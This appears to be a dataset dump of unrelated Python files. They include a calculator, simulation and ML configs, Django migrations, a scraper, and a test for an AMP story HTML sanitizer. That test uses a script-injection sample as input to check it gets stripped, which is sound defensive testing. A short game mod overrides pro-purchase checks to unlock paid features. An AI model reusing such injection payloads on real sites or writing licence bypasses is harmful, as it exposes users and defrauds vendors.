index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
990,900 | 6b0dc8484aa97bf8feb6c39b61f688323b79b53d | """Calculator For Random Things"""
__author__ = "Khushi Patel"
import math
def welcome_message():
"""
This function asks the user for their name in order to print a
welcome message.
"""
print("Welcome to the calculator.")
name = input("What is your name? ")
print("Let's get started, " + name + "! ", end='\n\n')
def addition(num1, num2):
"""
This function caclulates the sum of two numbers.
:param num1: First addend, inputed by the user as a number
:param num2: Second addend, inputed by the user as a number
:return: The sum of num1 and num2
"""
sum = num1 + num2
print("The sum is ", sum, ".\n", sep="")
def subtraction(num1, num2):
"""
This function caclulates the difference between two numbers
:param num1: First number inputed by the user, as a number.
:param num2: Amount being subtracted from num1, as a number.
:return: Difference between num1 and num2
"""
difference = num1 - num2
return difference
def division(num1, num2):
"""
This function calculates the quotient of two numbers and prints either the
quotient
the whole number and remainder, separately.
:param num1: The dividend, entered by the user as a number
:param num2: The divisor, entered by the user as a number.
"""
choice = input(
"Would you like \na) a quotient or \nb) the remainder and whole "
"number?\n")
# only returns the quotient as a decimal
if choice == "a" or choice == "A":
quotient = num1 / num2
print("The quotient is ", quotient, ".", sep="")
# returns the integer portion of the quotient and the remainder
elif choice == "B" or choice == "b":
remainder = num1 % num2
print("The remainder is, ", remainder, ".", sep="")
integer_portion = num1 // num2
print("Floor division: ", integer_portion, ".\n", sep="")
def multiplication(num1, num2):
"""
This function calculates the product of two numbers
:param num1: First multiplier, entered by the user as a number.
:param num2: Second multiplier, entered by the user as a number.
:return: The product of num1 and num2
"""
product = num1 * num2
return product
def exponents(num1, num2):
"""
This function calculates num1 to the power of num2
:param num1: The base, entered by the user as a number.
:param num2: The exponent, entered by the user as a number.
:return: The product of num1 to the power of num2.
"""
product = num1 ** num2
return product
def circle_area(radius):
"""
This function calculates the area of a circle.
:param radius: The radius given the by the user, as a number.
:return: The area of the circle
"""
area = radius ** 2 * math.pi
return area
def cube_area(side_length):
"""
This function calculates the area of a cube.
:param side_length: The length of one side of the cube, as a number.
:return: The area of the cube.
"""
area = side_length ** 3
return area
def inequalities(num1, num2):
"""
This function compares two numbers and prints an inequality.
:param num1: The first number to be compared in the inequality
:param num2: The second number to be compared in the inequality
"""
if num1 < num2:
print(num1, " is less than ", num2, sep="")
elif num1 == num2:
print(num1, "is equal to ", num2, sep="")
elif num1 > num2:
print(num1, " is great than ", num2, sep="")
else:
print("Could not compute an inequality.")
def range_function(num, start_range, end_range):
"""
This function checks to see if a number is in a certain range, entered
by the user.
:param num: The number being checked to see if it is in the range
:param start_range: The lower end of the range
:param end_range: The higher end of the range
"""
if num > start_range and num < end_range:
print(num, "is in the range.\n")
elif num < start_range or num > end_range:
print(num, "is not in the range.\n")
def main():
"""
The main function provides the user with a list of calculations to
choose from, takes the user's input, and performs calculations based on
the function corresponding to the choice the user made.
"""
welcome_message()
continue_program = True
num_calculations = 0
# all the calculation options in the program
calculation_options = ["addition", "subtraction", "division",
"multiplication", "exponents", "circle area",
"cube area",
"repeat words", "inequalities", "in-range",
"stop program"]
while continue_program:
print("Enter the option number of the calculation you would like to "
"perform: ")
# prints the calculations options list as a numbered list
for calculation in calculation_options:
print(calculation_options.index(calculation) + 1, ". ",
calculation, sep="")
while True:
try:
user_input = int(input(""))
break
except ValueError:
print(
"That was not a valid input. Please enter a whole number "
"between 1 and 11.")
if user_input in range(1, 12):
if user_input == 1: # addition
run_addition = True
while run_addition:
try:
user_num1 = float(input("Enter the first number: "))
user_num2 = float(input("Enter the second number: "))
addition(user_num1, user_num2)
run_addition = False
except ValueError:
print("That was not a valid input.")
elif user_input == 2: # subtraction
run_subtraction = True
while run_subtraction:
try:
user_num1 = float(input("Enter the first number: "))
user_num2 = float(input("Enter the second number: "))
print("The difference is ",
subtraction(user_num1, user_num2), ".\n", sep="")
run_subtraction = False
except ValueError:
print("That was not a valid input.")
elif user_input == 3: # division
run_division = True
while run_division:
try:
user_num1 = float(input("Enter a number: "))
user_num2 = float(input("Enter a second number: "))
division(user_num1, user_num2)
run_division = False
except ValueError:
print("That was not a valid input.")
elif user_input == 4: # multiplication
run_multiplication = True
while run_multiplication:
try:
user_num1 = float(input("Enter a number: "))
user_num2 = float(input("Enter a second number: "))
print("The product is ",
multiplication(user_num1, user_num2), ".\n",
sep="")
except ValueError:
print("That was not a valid input.")
elif user_input == 5: # calculates num1 to the num2 power
run_exponents = True
while run_exponents:
try:
user_num1 = float(input("Enter a number: "))
user_num2 = float(input("Enter a second number: "))
print(user_num1, " to the ", user_num2, " power is ",
exponents(user_num1, user_num2), ".\n", sep="")
run_exponents = False
except ValueError:
print("That was not a valid input.")
elif user_input == 6: # circle area
run_circle_area = True
while run_circle_area:
try:
user_radius = float(input("Enter a radius: "))
print("The area is ", circle_area(user_radius), ".\n",
sep="")
run_circle_area = False
except ValueError:
print("That was not a valid input.")
elif user_input == 7: # cube area
run_cube_area = True
while run_cube_area:
try:
user_length = float(
input("Enter the length of one side of the cube"))
print("The area of the cube is ",
cube_area(user_length), ".\n", sep="")
run_cube_area = False
except ValueError:
print("That was not a valid input.")
elif user_input == 8: # repeats given word a certain number of
# times
run_repeat = True
while run_repeat:
try:
user_word = input(
"Enter the word you want to repeat: ")
repeat = int(
input("How many times do you want to repeat it: "))
print(user_word * repeat, "\n")
run_repeat = False
except ValueError:
print("That was not a valid input.")
elif user_input == 9: # whether num1 <,>, or = num2
run_inequalities = True
while run_inequalities:
try:
user_num1 = float(input("Enter a number: "))
user_num2 = float(input("Enter a second number: "))
inequalities(user_num1, user_num2)
run_inequalities = False
except ValueError:
print("That was not a valid input.")
elif user_input == 10: # whether a number is in a certain range
run_range = True
while run_range:
try:
user_num = float(input("Enter a number: "))
user_start_range = float(
input("What number does the range start at? "))
user_end_range = float(
input("What number does the range end at? "))
range_function(user_num, user_start_range,
user_end_range)
run_range = False
except ValueError:
print("That was not a valid input.")
elif user_input == 11: # prints number of calculations performed
# ran and stops running
print("You ran the program", num_calculations, "times.")
continue_program = False
else:
print("That was not an option. Please select an option from "
"1 to 11.")
if user_input not in range(1, 12):
print(
"That was not an option. "
"Please select an option from 1 to 11.")
num_calculations += 1 # keeps count of the number of calculations
# performed
if __name__ == "__main__":
main()
|
990,901 | 37edac5e903511e1766df914f133080a8c9abf41 | """Config for drift system.
This is a system of circles that drift with constant velocity, do not interact,
and do not bounce of the walls.
This config has a train mode and a test mode. In the train mode there are 3-5
sprites, yet in the test mode there are 6-11.
To demo this task, navigate to the main directory and run the following:
'''
$ python demo.py --config=spriteworld_physics.configs.drift \
--hsv_colors=True
'''
"""
# pylint: disable=import-error
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
import os
from spriteworld import factor_distributions as distribs
from spriteworld import renderers as spriteworld_renderers
from spriteworld_physics import forces
from spriteworld_physics import generate_sprites
from spriteworld_physics import graph_generators
_NUM_SPRITES = {
'train': lambda: np.random.randint(3, 6),
'test': lambda: np.random.randint(6, 12),
}
def get_config(mode='train'):
"""Generate environment config.
Args:
mode: Unused task mode.
Returns:
config: Dictionary defining task/environment configuration. Can be fed
as kwargs to physics_environment.PhysicsEnvironment.
"""
# Factor distributions for the sprites.
factors = distribs.Product([
distribs.Continuous('x', 0.1, 0.9),
distribs.Continuous('y', 0.1, 0.9),
distribs.Discrete('shape', ['circle']),
distribs.Discrete('scale', [0.1]),
distribs.Continuous('c0', 0, 1),
distribs.Discrete('c1', [1.]),
distribs.Discrete('c2', [1.]),
distribs.Continuous('x_vel', -0.03, 0.03),
distribs.Continuous('y_vel', -0.03, 0.03),
distribs.Discrete('mass', [1]),
])
num_sprites = _NUM_SPRITES[mode]
sprite_gen = generate_sprites.generate_sprites(
factors, num_sprites=num_sprites)
graph_generator = graph_generators.FullyConnected(force=forces.NoForce)
renderers = {
'image':
spriteworld_renderers.PILRenderer(
image_size=(64, 64), anti_aliasing=5)
}
config = {
'graph_generators': (graph_generator,),
'renderers': renderers,
'init_sprites': sprite_gen,
'episode_length': 20,
'bounce_off_walls': False,
'metadata': {
'name': os.path.basename(__file__),
'mode': mode
}
}
return config
|
990,902 | 6959a05fa9d84982a113eeaeea8e4d95ad612924 | #modBySobyDamn
from bsUtils import *
import bsUtils
bs.screenMessage("Pro Unlocked By SobyDamn")
def _000OOO0():
return True
def _00000OOO():
return True
bsUtils._haveProOptions = _000OOO0
bsUtils._havePro = _00000OOO |
990,903 | a4303f7fb10c65ca80a2692daa7bae03364e4e8c | import unittest
from bs4 import BeautifulSoup
from webstories import Story, StoryPage
class TestStory(unittest.TestCase):
def setUp(self):
self.example_html = """
<!doctype html>
<html ⚡>
<head>
<meta charset="utf-8">
<title>Joy of Pets</title>
<link rel="canonical" href="pets.html">
<meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1">
<style amp-boilerplate>body{-webkit-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-moz-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-ms-animation:-amp-start 8s steps(1,end) 0s 1 normal both;animation:-amp-start 8s steps(1,end) 0s 1 normal both}@-webkit-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-moz-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-ms-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-o-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}</style><noscript><style amp-boilerplate>body{-webkit-animation:none;-moz-animation:none;-ms-animation:none;animation:none}</style></noscript>
<script async src="https://cdn.ampproject.org/v0.js"></script>
<script async custom-element="amp-video"
src="https://cdn.ampproject.org/v0/amp-video-0.1.js"></script>
<script async custom-element="amp-story"
src="https://cdn.ampproject.org/v0/amp-story-1.0.js"></script>
<style amp-custom>#page1 {background-color: blue;}</style>
</head>
<body>
<!-- Cover page -->
<amp-story standalone
title="Joy of Pets"
publisher="AMP tutorials"
publisher-logo-src="assets/AMP-Brand-White-Icon.svg"
poster-portrait-src="assets/cover.jpg">
<amp-story-page id="cover">
<amp-story-grid-layer template="fill">
<amp-img src="assets/cover.jpg"
width="720" height="1280"
layout="responsive">
</amp-img>
</amp-story-grid-layer>
<amp-story-grid-layer template="vertical">
<h1>The Joy of Pets</h1>
<p>By AMP Tutorials</p>
</amp-story-grid-layer>
</amp-story-page>
<!-- Page 1 -->
<amp-story-page id="page1">
<amp-story-grid-layer template="vertical">
<h1>Cats</h1>
<amp-img src="assets/cat.jpg"
width="720" height="1280"
layout="responsive">
</amp-img>
<q>Dogs come when they're called. Cats take a message and get back to you. --Mary Bly</q>
</amp-story-grid-layer>
</amp-story-page>
</amp-story>
</body>
</html>
"""
self.expected_clean_html_good = """
<amp-story-page id="page1">
<amp-story-grid-layer template="vertical">
<h1>Cats</h1>
<amp-img height="1280" layout="responsive" src="assets/cat.jpg" width="720">
</amp-img>
<q>Dogs come when they're called. Cats take a message and get back to you. --Mary Bly</q>
</amp-story-grid-layer>
</amp-story-page>
"""
self.example_bad_html = """
<!doctype html>
<html ⚡>
<head>
<meta charset="utf-8">
<title>Joy of Pets</title>
<link rel="canonical" href="pets.html">
<meta name="viewport" content="width=device-width,minimum-scale=1,initial-scale=1">
<style amp-boilerplate>body{-webkit-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-moz-animation:-amp-start 8s steps(1,end) 0s 1 normal both;-ms-animation:-amp-start 8s steps(1,end) 0s 1 normal both;animation:-amp-start 8s steps(1,end) 0s 1 normal both}@-webkit-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-moz-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-ms-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@-o-keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}@keyframes -amp-start{from{visibility:hidden}to{visibility:visible}}</style><noscript><style amp-boilerplate>body{-webkit-animation:none;-moz-animation:none;-ms-animation:none;animation:none}</style></noscript>
<script async src="https://cdn.ampproject.org/v0.js"></script>
<script async custom-element="amp-video"
src="https://cdn.ampproject.org/v0/amp-video-0.1.js"></script>
<script async custom-element="amp-story"
src="https://cdn.ampproject.org/v0/amp-story-1.0.js"></script>
<style amp-custom>
</style>
</head>
<body>
<!-- Cover page -->
<amp-story standalone
title="Joy of Pets"
publisher="AMP tutorials"
publisher-logo-src="assets/AMP-Brand-White-Icon.svg"
poster-portrait-src="assets/cover.jpg">
<amp-story-page id="cover">
<amp-story-grid-layer template="fill" data-coffee="yes" sugar="no">
<script>alert('evil javascript');</script>
<script type="application/json">{"text": "JSON is OK"}</script>
<amp-img src="assets/cover.jpg"
width="720" height="1280"
layout="responsive">
</amp-img>
</amp-story-grid-layer>
<amp-story-grid-layer template="vertical">
<h1>The Joy of Pets</h1>
<p>By AMP Tutorials</p>
<form>
<p>look at me, I'm in a form</p>
</form>
</amp-story-grid-layer>
</amp-story-page>
</amp-story>
</body>
</html>
"""
self.expected_clean_html_bad = """
<amp-story-page id="cover">
<amp-story-grid-layer template="fill" data-coffee="yes">
<script type="application/json">{"text": "JSON is OK"}</script>
<amp-img src="assets/cover.jpg" width="720" height="1280" layout="responsive">
</amp-img>
</amp-story-grid-layer>
<amp-story-grid-layer template="vertical">
<h1>The Joy of Pets</h1>
<p>By AMP Tutorials</p>
<p>look at me, I'm in a form</p>
</amp-story-grid-layer>
</amp-story-page>
"""
def assertHTMLEqual(self, str1, str2):
soup1 = BeautifulSoup(str1.strip(), 'html.parser')
soup2 = BeautifulSoup(str2.strip(), 'html.parser')
self.assertEqual(soup1, soup2)
def test_properties(self):
story = Story(self.example_html)
self.assertEqual(story.title, "Joy of Pets")
self.assertEqual(story.publisher, "AMP tutorials")
self.assertEqual(story.custom_css, "#page1 {background-color: blue;}")
self.assertEqual(story.pages[0].id, "cover")
def test_reject_invalid_story(self):
with self.assertRaises(Story.InvalidStoryException):
Story("<!doctype html><html><head></head><body><p>Not a story</p></body></html>")
def test_clean_html(self):
story = Story(self.example_html)
self.assertHTMLEqual(story.pages[1].get_clean_html(), self.expected_clean_html_good)
story = Story(self.example_bad_html)
self.assertHTMLEqual(story.pages[0].get_clean_html(), self.expected_clean_html_bad)
def test_clean_html_static_method(self):
bad_html = """
<amp-story-page id="cover">
<amp-story-grid-layer template="fill" data-coffee="yes" sugar="no">
<script>alert('evil javascript');</script>
<script type="application/json">{"text": "JSON is OK"}</script>
<amp-img src="assets/cover.jpg"
width="720" height="1280"
layout="responsive">
</amp-img>
</amp-story-grid-layer>
<amp-story-grid-layer template="vertical">
<h1>The Joy of Pets</h1>
<p>By AMP Tutorials</p>
<form>
<p>look at me, I'm in a form</p>
</form>
</amp-story-grid-layer>
</amp-story-page>
"""
self.assertHTMLEqual(StoryPage.clean_html_fragment(bad_html), self.expected_clean_html_bad)
|
990,904 | b55851f00e7e98da5bb213a20538040b561900fd | import inspect
import os
import sys
CURRENT_DIR = os.path.dirname(os.path.abspath(
inspect.getfile(inspect.currentframe())))
PARENT_DIR = os.path.dirname(CURRENT_DIR)
# Include paths for module search
sys.path.insert(0, PARENT_DIR)
import numpy as np
import pytest
from myapi import vecutil
class TestVecUtil():
def test_random_vec_success(self):
length = 1
vector = vecutil.random_vec(length)
assert len(vector) == length
length = 5
vector = vecutil.random_vec(length)
assert len(vector) == length
def test_random_vec_fail(self):
with pytest.raises(ValueError):
length = -1
vector = vecutil.random_vec(length)
with pytest.raises(ValueError):
length = 0
vector = vecutil.random_vec(length)
with pytest.raises(ValueError):
length = 1.5
vector = vecutil.random_vec(length)
def test_normalize_vec(self):
length = 5
vector = vecutil.random_vec(length)
norm_vec = vecutil.normalize_vec(vector)
# Compare double value
assert np.linalg.norm(norm_vec) - 1 < 0.00000001 |
990,905 | 7831a1b567629aac87577f12cadafffa7cd65e2f | from flask_sqlalchemy import SQLAlchemy
from flask import Flask, request, jsonify, render_template
from db import Member, Facility, db
import json
import psycopg2
import config
app = Flask(__name__)
app.config["DEBUG"] = False
# app config
app.config["SQLALCHEMY_DATABASE_URI"] = config.URI
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False
app.config["SQLALCHEMY_ECHO"] = True
db.init_app(app)
with app.app_context():
db.create_all()
@app.route('/')
def hello():
return "Welcome to the Kalpataru Residency's ClubHouse Manager!"
if __name__ == '__main__':
app.run()
|
990,906 | 8e2a2cf1a7084e8477987006823acc17a6adb62b | """Initialize the distributed services"""
import multiprocessing as mp
import traceback
import atexit
import time
import os
import sys
from . import rpc
from .constants import MAX_QUEUE_SIZE
from .kvstore import init_kvstore, close_kvstore
from .rpc_client import connect_to_server, shutdown_servers
from .role import init_role
from .. import utils
SAMPLER_POOL = None
NUM_SAMPLER_WORKERS = 0
INITIALIZED = False
def set_initialized(value=True):
"""Set the initialized state of rpc"""
global INITIALIZED
INITIALIZED = value
def get_sampler_pool():
"""Return the sampler pool and num_workers"""
return SAMPLER_POOL, NUM_SAMPLER_WORKERS
def _init_rpc(ip_config, num_servers, max_queue_size, net_type, role, num_threads):
''' This init function is called in the worker processes.
'''
try:
utils.set_num_threads(num_threads)
if os.environ.get('DGL_DIST_MODE', 'standalone') != 'standalone':
connect_to_server(ip_config, num_servers, max_queue_size, net_type)
init_role(role)
init_kvstore(ip_config, num_servers, role)
except Exception as e:
print(e, flush=True)
traceback.print_exc()
raise e
def initialize(ip_config, num_servers=1, num_workers=0,
max_queue_size=MAX_QUEUE_SIZE, net_type='socket',
num_worker_threads=1):
"""Initialize DGL's distributed module
This function initializes DGL's distributed module. It acts differently in server
or client modes. In the server mode, it runs the server code and never returns.
In the client mode, it builds connections with servers for communication and
creates worker processes for distributed sampling. `num_workers` specifies
the number of sampling worker processes per trainer process.
Users also have to provide the number of server processes on each machine in order
to connect to all the server processes in the cluster of machines correctly.
Parameters
----------
ip_config: str
File path of ip_config file
num_servers : int
The number of server processes on each machine. This argument is deprecated in DGL 0.7.0.
num_workers: int
Number of worker process on each machine. The worker processes are used
for distributed sampling. This argument is deprecated in DGL 0.7.0.
max_queue_size : int
Maximal size (bytes) of client queue buffer (~20 GB on default).
Note that the 20 GB is just an upper-bound and DGL uses zero-copy and
it will not allocate 20GB memory at once.
net_type : str, optional
Networking type. Currently the only valid option is ``'socket'``.
Default: ``'socket'``
num_worker_threads: int
The number of threads in a worker process.
Note
----
Users have to invoke this API before any DGL's distributed API and framework-specific
distributed API. For example, when used with Pytorch, users have to invoke this function
before Pytorch's `pytorch.distributed.init_process_group`.
"""
if os.environ.get('DGL_ROLE', 'client') == 'server':
from .dist_graph import DistGraphServer
assert os.environ.get('DGL_SERVER_ID') is not None, \
'Please define DGL_SERVER_ID to run DistGraph server'
assert os.environ.get('DGL_IP_CONFIG') is not None, \
'Please define DGL_IP_CONFIG to run DistGraph server'
assert os.environ.get('DGL_NUM_SERVER') is not None, \
'Please define DGL_NUM_SERVER to run DistGraph server'
assert os.environ.get('DGL_NUM_CLIENT') is not None, \
'Please define DGL_NUM_CLIENT to run DistGraph server'
assert os.environ.get('DGL_CONF_PATH') is not None, \
'Please define DGL_CONF_PATH to run DistGraph server'
serv = DistGraphServer(int(os.environ.get('DGL_SERVER_ID')),
os.environ.get('DGL_IP_CONFIG'),
int(os.environ.get('DGL_NUM_SERVER')),
int(os.environ.get('DGL_NUM_CLIENT')),
os.environ.get('DGL_CONF_PATH'))
serv.start()
sys.exit()
else:
if os.environ.get('DGL_NUM_SAMPLER') is not None:
num_workers = int(os.environ.get('DGL_NUM_SAMPLER'))
else:
num_workers = 0
if os.environ.get('DGL_NUM_SERVER') is not None:
num_servers = int(os.environ.get('DGL_NUM_SERVER'))
else:
num_servers = 1
rpc.reset()
ctx = mp.get_context("spawn")
global SAMPLER_POOL
global NUM_SAMPLER_WORKERS
is_standalone = os.environ.get('DGL_DIST_MODE', 'standalone') == 'standalone'
if num_workers > 0 and not is_standalone:
SAMPLER_POOL = ctx.Pool(num_workers, initializer=_init_rpc,
initargs=(ip_config, num_servers, max_queue_size,
net_type, 'sampler', num_worker_threads))
else:
SAMPLER_POOL = None
NUM_SAMPLER_WORKERS = num_workers
if not is_standalone:
assert num_servers is not None and num_servers > 0, \
'The number of servers per machine must be specified with a positive number.'
connect_to_server(ip_config, num_servers, max_queue_size, net_type)
init_role('default')
init_kvstore(ip_config, num_servers, 'default')
def finalize_client():
"""Release resources of this client."""
if os.environ.get('DGL_DIST_MODE', 'standalone') != 'standalone':
rpc.finalize_sender()
rpc.finalize_receiver()
global INITIALIZED
INITIALIZED = False
def _exit():
exit_client()
time.sleep(1)
def finalize_worker():
"""Finalize workers
Python's multiprocessing pool will not call atexit function when close
"""
if SAMPLER_POOL is not None:
for _ in range(NUM_SAMPLER_WORKERS):
SAMPLER_POOL.apply_async(_exit)
time.sleep(0.1) # This is necessary but I don't know why
SAMPLER_POOL.close()
def join_finalize_worker():
"""join the worker close process"""
global SAMPLER_POOL
if SAMPLER_POOL is not None:
SAMPLER_POOL.join()
SAMPLER_POOL = None
def is_initialized():
"""Is RPC initialized?
"""
return INITIALIZED
def exit_client():
"""Trainer exits
This function is called automatically when a Python process exits. Normally,
the training script does not need to invoke this function at the end.
In the case that the training script needs to initialize the distributed module
multiple times (so far, this is needed in the unit tests), the training script
needs to call `exit_client` before calling `initialize` again.
"""
# Only client with rank_0 will send shutdown request to servers.
finalize_worker() # finalize workers should be earilier than barrier, and non-blocking
if os.environ.get('DGL_DIST_MODE', 'standalone') != 'standalone':
rpc.client_barrier()
shutdown_servers()
finalize_client()
join_finalize_worker()
close_kvstore()
atexit.unregister(exit_client)
|
990,907 | 9cd6e75cf7f4921eb30834b7412bc35f8e7b7d04 | #!/usr/bin/env python3
import argparse
from bs4 import BeautifulSoup
import logging
import os
import pdb
import requests
import subprocess
def initlog():
FormatString='%(asctime)s %(levelname)s %(lineno)s %(message)s'
logging.basicConfig(level = logging.DEBUG, format=FormatString)
logger = logging.getLogger('scraper')
fileHandler = logging.FileHandler(filename = './scraper.log')
fileHandler.setFormatter(logging.Formatter(fmt=FormatString))
fileHandler.setLevel(logging.DEBUG)
logger.addHandler(fileHandler)
return logger
def commandline():
parser = argparse.ArgumentParser()
parser.add_argument('--dryrun', dest='dryrun', default=False, action='store_true')
parser.add_argument( dest='src', help='source (URL)')
# parser.add_argument('--prefix', dest='prefix', default='', help='prefix filenames with a prefix')
# parser.add_argument('--nofilm', dest='nofilm', action='store_true', default=False, help='run with no film loaded')
# parser.add_argument('--noled', dest='noled', action='store_true', default=False, help='run with no LED')
# parser.add_argument('--film', dest='film', choices=['super8','8mm'], help='8mm/super8')
# parser.add_argument('--dir', dest='dir', required=True, help='set project directory')
# parser.add_argument('--single', dest='singleframe', action='store_true', default=False, help='One image per frame')
# parser.add_argument('--startdia', dest='startdia', type=int, default=62, help='Feed spool starting diameter (mm)')
# parser.add_argument('--enddia', dest='enddia', type=int, default=35, help='Feed spool ending diameter (mm)')
# parser.add_argument('--raspid', dest='raspid', type=int, default=0, help='raspistill PID')
# parser.add_argument('--picamera', dest='picamera', action='store_true', default=False, help='use picamera lib')
# parser.add_argument('--picameracont', dest='picameracont', action='store_true', default=False, help='use picamera lib')
return parser.parse_args()
def getstory(log, title, url):
if os.path.exists(f'{title}.html'):
return
log.info(title)
doc = requests.get(url)
if 200 != doc.status_code:
log.error(f'getstory returns {r.status_code}')
return
soup = BeautifulSoup(doc.text, 'html.parser')
text = soup.find(class_='story-text')
open(f'{title}.html', 'wb').write(f'{soup.html.title}<body>{text.prettify()}</body>'.encode())
cmd = ['pandoc', '--to', 'epub', '--metadata', f'title:{title}', f'{title}.html', '-o', f'{title}.epub']
log.info(cmd)
subprocess.run(cmd)
def backissue(log, cmd):
# if not os.path.exists('backissue.html'):
doc = requests.get(cmd.src)
if 200 != doc.status_code:
log.error('http returns {}'.r.status_code)
return
html = doc.text
# open('backissue.html', 'wb').write(html.encode())
# html = open('backissue.html', 'rb').read().decode()
soup = BeautifulSoup(html, 'html.parser')
#stories = [story.a for story in soup.find_all(class_='story')]
for index in soup(class_='index-table'):
for section in index(class_='section'):
if not 'FICTION' == section.text:
continue
stories = [story.a for story in section.parent(class_='story')]
for title,url in [(s.text, s['href']) for s in stories]:
getstory(log, title,url)
# sections = [x.text for y in indices for x in y[class_='section']]
def main():
log = initlog()
cmdline = commandline()
backissue(log, cmdline)
main()
|
990,908 | b6e412119e01e6c64ec2602003fbd7f577d13e95 | # Generated by Django 2.2.10 on 2021-10-05 20:30
import django.contrib.postgres.fields.jsonb
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('main', '0003_auto_20211005_2217'),
]
operations = [
migrations.CreateModel(
name='Answer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('uuid', models.IntegerField()),
('answer', django.contrib.postgres.fields.jsonb.JSONField()),
('question', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='main.Question')),
],
options={
'verbose_name': 'Ответ',
'verbose_name_plural': 'Ответы',
},
),
migrations.DeleteModel(
name='Answers',
),
]
|
990,909 | a46308c8e2284a4a16bfdf3e710fd73118bc3545 | # Generated by Django 2.2 on 2019-04-20 16:15
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cergen', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='ReferenceEquipment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('description', models.CharField(max_length=150)),
('serial_number', models.CharField(max_length=150)),
('protocol', models.CharField(max_length=150)),
('callibration_data', models.CharField(max_length=150)),
('validity', models.CharField(max_length=150)),
],
options={
'db_table': 'ReferenceEquipment',
},
),
]
|
990,910 | 1a2752cd47cca9b16c6f0572346bae0e06d3ce28 | '''
Tests agiovanni.intersect code.
'''
__author__ = 'Christine Smit <christine.e.smit@nasa.gov>'
import unittest
import os
import agiovanni.intersect as intersect
class Test(unittest.TestCase):
"""Tests that the intersection code."""
def setUp(self):
test_dir = os.path.dirname(__file__)
self.test_file_dir = os.path.join(test_dir, 'test_intersect')
def testEsriShapefile(self):
us_states = os.path.join(self.test_file_dir, 'tl_2014_us_state.shp')
countries = os.path.join(self.test_file_dir, 'state_dept_countries.shp')
# NOTE: Maryland is shp_4
self.assertTrue(
intersect.intersects("-180,-90,180,90", us_states, 'shp_4'),
"Maryland shape intersects with the entire globe")
self.assertTrue(
intersect.intersects(
"-76.5527, 39.0271, -75.1025, 40.2356",
us_states,
'shp_4'),
"Maryland shape intersects with smaller bounding box")
self.assertFalse(
intersect.intersects(
"-129.375, 24.7266, -68.9062, 57.0703",
countries,
'shp_162'),
"Nigeria shape does not intersect with bounding box over United States")
self.assertFalse(
intersect.intersects(
"-78.9258, 38.4558, -77.915, 39.2029",
us_states,
'shp_4'),
"Maryland shape does not intersect with bounding box in Virginia")
self.assertFalse(
intersect.intersects(
"-77, 39, -77, 39",
us_states,
'shp_4'),
"Points don't intersect with shapes.")
# NOTE: Alaska is shp_40
self.assertTrue(
intersect.intersects(
"172.8369, 50.5005, -179.6045, 53.8403",
us_states,
'shp_40'),
"Alaska intersects with bounding box over 180 meridian")
self.assertTrue(
intersect.intersects(
"164.6631, 50.5518, -167.0361, 56.792",
us_states,
'shp_40'),
"Alaska intersects with bounding box over 180 meridian")
self.assertFalse(
intersect.intersects(
"168.6182, 11.3086, -168.8818, 33.8086",
us_states,
'shp_40'),
"Alaska does not intersect with this bounding box over 180 meridian")
self.assertFalse(
intersect.intersects(
"176.5283, 53.9282, -175.8691, 57.2681",
us_states,
'shp_40'),
"Alaska does not intersect with this bounding box over 180 meridian")
def testMaskShape(self):
gpm = os.path.join(self.test_file_dir, "gpmLandSeaMask.nc")
self.assertTrue(
intersect.intersects(
"-180,-90,180,90",
gpm),
"GPM land sea mask has positive values somewhere on the planet")
self.assertTrue(
intersect.intersects(
"-54.1406, -28.7109, -30.9375, -4.8047",
gpm),
"GPM land sea mask has positive values off Brazil coast")
self.assertFalse(
intersect.intersects(
"18.9404, -33.4351, 23.2031, -29.7876",
gpm),
"GPM land sea mask has no positive values in the middle of South Africa")
self.assertFalse(
intersect.intersects(
"179.2969, 66.98, -179.2969, 68.1665",
gpm),
"GPM land sea mask has no positive values in Russia over 180 meridian")
self.assertTrue(
intersect.intersects(
"171.5625, 26.0742, -173.6719, 35.5664",
gpm),
"GPM land sea mask is all zero over 180 meridian in the Pacific")
self.assertFalse(
intersect.intersects(
"0.0,0.0,0.0,0.0",
gpm),
"Points don't intersect")
if __name__ == "__main__":
unittest.main()
|
990,911 | 9c9569c2a37690741b47abd8e1f22465903664f7 | import os
import os.path
from argparse import ArgumentParser
from functools import wraps
import logging
logging.captureWarnings(True)
logger = logging.getLogger('')
logger.setLevel(logging.DEBUG)
handler = logging.StreamHandler()
formatter = logging.Formatter(fmt='%(message)s',datefmt='%Y-%m-%d %H:%M:%S')
handler.setFormatter(formatter)
logger.addHandler(handler)
from . import (
compile_solution, run_file, run_test,
find_solutions, find_testcases,
generate_submission, submit_solution,
clean_generated_files
)
from .clients import ClientLoader
def argument(*args, **kwargs):
return lambda parser: parser.add_argument(*args, **kwargs)
class Command(object):
def __init__(self, parser):
self._parser = parser
self._subparsers = parser.add_subparsers(dest="COMMAND")
self._commands = {}
def __call__(self, *arguments):
def decorator(func):
name = func.__name__.replace("_", "-")
subparser = self._subparsers.add_parser(name, help = func.__doc__)
dests = [arg(subparser).dest for arg in arguments]
@wraps(func)
def wrapper(cfg,args):
return func(cfg,**{d:getattr(args, d) for d in dests if getattr(args, d) is not None})
self._commands[name] = wrapper
return wrapper
return decorator
def parse(self):
args = self._parser.parse_args()
return self._commands[args.COMMAND or "help"], args
parser = ArgumentParser(description="IX")
